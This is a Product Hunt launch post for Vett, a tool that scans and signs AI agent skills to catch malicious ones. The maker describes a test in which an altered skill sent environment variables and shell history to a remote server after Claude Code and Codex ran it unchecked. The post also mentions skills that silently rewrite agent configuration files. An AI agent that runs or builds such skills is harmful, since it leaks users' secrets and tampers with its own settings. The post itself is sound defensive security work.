Launching today
vett
Scan, sign, and verify AI agent skills before installing
4 followers
Scan, sign, and verify AI agent skills before installing
4 followers
When you install an AI agent skill, you're running code pulled from GitHub at HEAD with no signing, versioning, or scanning. Vett scans every skill before it reaches your machine: static analysis, exfiltration chain detection, OSV dependency checks, and Sigstore signing. Early scans have already turned up malware disguised as Google and LinkedIn tools, and skills with thousands of installs that quietly modify your agent's own configuration files.
Hey Product Hunt π
When you install an AI agent skill, you're trusting a GitHub repo you've never audited, pulled at HEAD with no signing, scanning, or versioning. I took an official skill, added a few lines to exfiltrate environment variables and shell history to a remote server, and installed it into Claude Code and Codex. Both ran the script without question.
How Vett works:
The static analyzer runs across every skill before installation: 40+ detection rules, AST-based data flow tracking for JS/TS, and source-to-sink exfiltration chain detection. A script that reads .env and makes an outbound HTTP request is flagged as an exfiltration chain, not two separate findings. Dependencies get checked against the OSV vulnerability database, and clean skills get Sigstore signing. For ambiguous cases, a second pass uses an LLM to compare observed behavior against declared purpose.
Early scans have revealed malware disguised as Google and LinkedIn tools, as well as skills with thousands of installations that quietly modify your agent's own configuration files.
Questions, feedback, and poking holes in the detection approach are all welcome π